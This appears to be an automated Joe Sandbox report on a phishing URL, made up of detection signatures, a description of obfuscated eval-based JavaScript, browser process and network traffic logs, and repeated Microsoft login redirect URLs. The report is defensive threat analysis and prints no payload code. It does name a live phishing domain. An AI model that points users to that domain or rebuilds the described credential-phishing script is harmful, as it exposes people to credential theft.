Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://jkqbjwq.maxiite.com

Overview

General Information

Sample URL:https://jkqbjwq.maxiite.com
Analysis ID:1580031
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected suspicious Javascript
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,6646781013531154719,7133456600072816568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_223JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.0.id.script.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://jkqbjwq.maxiite.comAvira URL Cloud: detection malicious, Label: phishing
      Source: https://jkqbjwq.maxiite.com/Avira URL Cloud: Label: phishing

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.id.script.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_223, type: DROPPED
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jkqbjwq.maxiite.com/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of the `eval()` function to execute a heavily encoded string is a clear indicator of malicious intent. Additionally, the script appears to be attempting to bypass the same-origin policy by checking if the current window is not `google.com`. This suggests the script may be trying to redirect users to a malicious domain or perform other unauthorized actions. Overall, the combination of these high-risk indicators warrants a high-risk score.
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: Form action: https://answers.microsoft.com/ microsoftonline microsoft
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0HTTP Parser: Number of links: 0
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: Number of links: 0
      Source: https://www.bing.com/search?q=officeHTTP Parser: Base64 decoded: {"balance":0,"goalTrackEnabled":false,"goalTrackBalance":0,"slim":false,"autoOpenFlyoutIdSelector":"id_h"}
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0HTTP Parser: Title: Redirecting does not match URL
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: Title: Redirecting does not match URL
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0HTTP Parser: No favicon
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No favicon
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No favicon
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0HTTP Parser: No <meta name="author".. found
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0HTTP Parser: No <meta name="copyright".. found
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
      Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=a81d90ac-aa75-4cf8-b14c-58bf348528fe&redirect_uri=https%3A%2F%2Fanswers.microsoft.com&response_type=code%20id_token&scope=openid%20profile&state=OpenIdConnect.AuthenticationProperties%3DL_lFZGvpMR2Grf2LRWiPb9Lx4cBttKfZoQOFbAIw0BFXANGUV_evvcUfG0Th6FQ3GMZT1JocQafi9jHMMs4pLX3Xdho75GOIognqKiTYs9Knd-q8d5WviOQl0Yqk_UdwDH8KLiasD_HyDsEJBJtYRFZ39bMy-2C_5K8m0qG5HPd0S-7u22BKmrNeyJrBX5AltAE8x8XqOtXdqHAii6SjHgOBFLlxR5WywdS1jjwchiYEGbMAu31Zy_1BnQIbH0G1Wyj_8fPhP9Pgg1lULE44jU3TbC1gMBqEop1qiPvrvpDiobuz1pqlr7RwPpaVDqE2xUANuUoUMUWroyTYO62OWuHo0mEamjkbDopK9EdmJs9MvpW9B8qPDVLZa5WbCdZ4&response_mode=form_post&nonce=638705729372435951.MTliOTRjZjMtNWI3ZS00YjI4LWI5YWItMWYwMjcwMWQ4OTdmNjZjYjdhMDYtNmVlZC00MmQ0LWJjZTMtNzAxNWVkZDg4Nzdm&nopa=2&prompt=none&x-client-SKU=ID_NET472&x-client-ver=7.6.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: jkqbjwq.maxiite.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: jkqbjwq.maxiite.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: aefd.nelreports.net
      Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
      Source: global trafficDNS traffic detected: DNS query: consentdeliveryfd.azurefd.net
      Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
      Source: unknownHTTP traffic detected: POST /report/v4?s=JaM1TPzdFYBViMywUD4wdPXx%2Fa95Uex4gZZPAeXFyFUHnQVmBW504NPeNMwjsFwmjuWUzjK3WdT4iwdHuFjINyZxJ6eXwtiJpe6a%2FblM4q9Ogb73TPBpaMt794bF9d95bWtCTbZm HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 390Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_226.2.drString found in binary or memory: http://schema.org/Organization
      Source: chromecache_226.2.drString found in binary or memory: http://www.asp.net/ajaxlibrary/CDN.ashx.--
      Source: chromecache_352.2.dr, chromecache_339.2.drString found in binary or memory: https://3pcookiecheck.azureedge.net
      Source: chromecache_226.2.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
      Source: chromecache_226.2.drString found in binary or memory: https://consentdeliveryfd.azurefd.net/mscc/lib/v2/wcp-consent.js
      Source: chromecache_155.2.dr, chromecache_194.2.drString found in binary or memory: https://developer.snapappointments.com/bootstrap-select)
      Source: chromecache_211.2.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_182.2.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_155.2.dr, chromecache_194.2.drString found in binary or memory: https://github.com/snapappointments/bootstrap-select/blob/master/LICENSE)
      Source: chromecache_182.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
